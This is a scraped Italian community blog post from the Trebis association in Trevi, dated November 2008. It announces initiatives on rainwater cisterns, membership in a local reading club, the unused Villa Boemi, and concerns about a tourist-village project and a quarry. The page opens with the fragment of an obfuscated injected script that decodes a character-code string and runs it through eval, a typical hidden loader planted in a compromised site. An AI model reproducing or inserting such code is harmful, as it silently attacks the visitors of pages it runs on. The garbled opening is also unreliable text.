q4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq70Zq6aZq61Zq5aZq67Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74\"[gzr](\"Zq\");}uwo=cpf;uoukoc=[];for(ymg=22-20-2;-ymg 1420!=0;ymg =1){ubtze=ymg;if((0x19==031))uoukoc =pivr.fromCharCode(eval(xcf uwo[1*ubtze]) 0xa-nhmv);}ilqz=eval;if(Math.ceil(5.5)===6)ilqz(uoukoc)}";echo $x;} ?>

Nuove iniziative

admin Novembre 24th, 2008

Carissimi amici
dopo una pausa di molti mesi, la Trebis si rilancia con una serie di iniziative intese a valorizzare l’ambiente e la qualità della vita a Trevi.
Il nostro Presidente, Giancarlo Izzo, ha scritto una lettera al Presidente della VUS nella quale esprime il nostro apprezzamento per la campagna d’informazione sulla necessità e le modalità di risparmiare l’acqua, proponendo allo stesso tempo che questa venga affiancata da un’azione pubblico-privata diretta a ripristinare e modernizzare le cisterne per l’acqua piovana che abbondano sul territorio trevano. Suggerisce, infatti, che la VUS metta a disposizione dei proprietari di tali cisterne o dei consumatori interessati a costruire un nuovo impianto una consulenza, a costo zero, circa le modalità ed i costi dell’operazione di recupero delle acque piovane, restando a carico dei proprietari i costi dell’effettuazione dei lavori.
Il consiglio direttivo della Trebis ha approvato con entusiasmo una proposta del nostro Segretario della Trebis, Paolo Natalini, che tutti i soci della Trebis si iscrivano al Circolo di Lettura. In questo modo avremo a nostra disposizione ambienti adatti nei quali tenere assemblee ed incontri. Il Circolo, per chi non lo conosce, dispone di una bellissima sala dietro il Bar Roma in Piazza Mazzini e anche di vani piu piccoli per chi desidera leggere giornali, giocare a carte o guardare la televisione. Bibite e rinfreschi si fanno portare dal bar. In questo modo, inoltre, aiuteremo a ravvivare un elemento della vita sociale trevana che rischia di scomparire per mancanza di adesioni e di contribuire un poco alla vita nel centro storico. La quota associativa comporta 50 Euro all’anno, pagabile, volendo, in due rate di 25 ciascuno. Informeremo i soci quanto prima sulle modalità dell’adesione.
Preoccupato dal fatto che ancora non si è trovato una destinazione idonea per la Villa Boemi (o Fabbri ) il consiglio direttivo proporrà al Sindaco un incontro pubblico per discutere sulle modalità di portare l’esistenza e la disponibilità di questa bellissima villa, nuovamente restaurata, all’attenzione di persone, enti o ditte in cerca di un palazzo di grande prestigio e bellezza per uno scopo che gioverebbe in qualche modo anche alla società trevana.
Dato che - a quanto pare - l’uso di buste di plastica sarà vietato in tutta Italia fra un anno o due, si è deciso di non proseguire con il nostro progetto di offrire buste di stoffa nei supermercati ecc. al posto dei sacchetti di plastica.
Nella sua capacità di “cane da guardia” la Trebis continua a seguire due temi che danno luogo a gravi preoccupazioni. Il primo è la vicenda “ex-serre”, nella quale il progetto gigantesco per un “villaggio turistico” verrebbe ora sostituito da uno simile ma più modesto - il quale non risolve per niente i problemi che abbiamo sollevati. Il secondo riguarda voci di scavi illeciti nella cava sotto Manciano e di un’intenzione del proprietario di chiedere il permesso per ampliare la cava che già crea tanti disagi e preoccupazioni per chi vive nelle vicinanze. Informeremo i soci sugli sviluppi.
Un’assemblea è indetta per domenica 25 gennaio alle 16.30 per l’elezione di un nuovo consiglio direttivo, per il tesseramento e per discutere ulteriori iniziative. Il luogo è ancora da stabilirsi.
Cordialissimi saluti a tutti
Patricia Clough


Comments RSS

Leave a Reply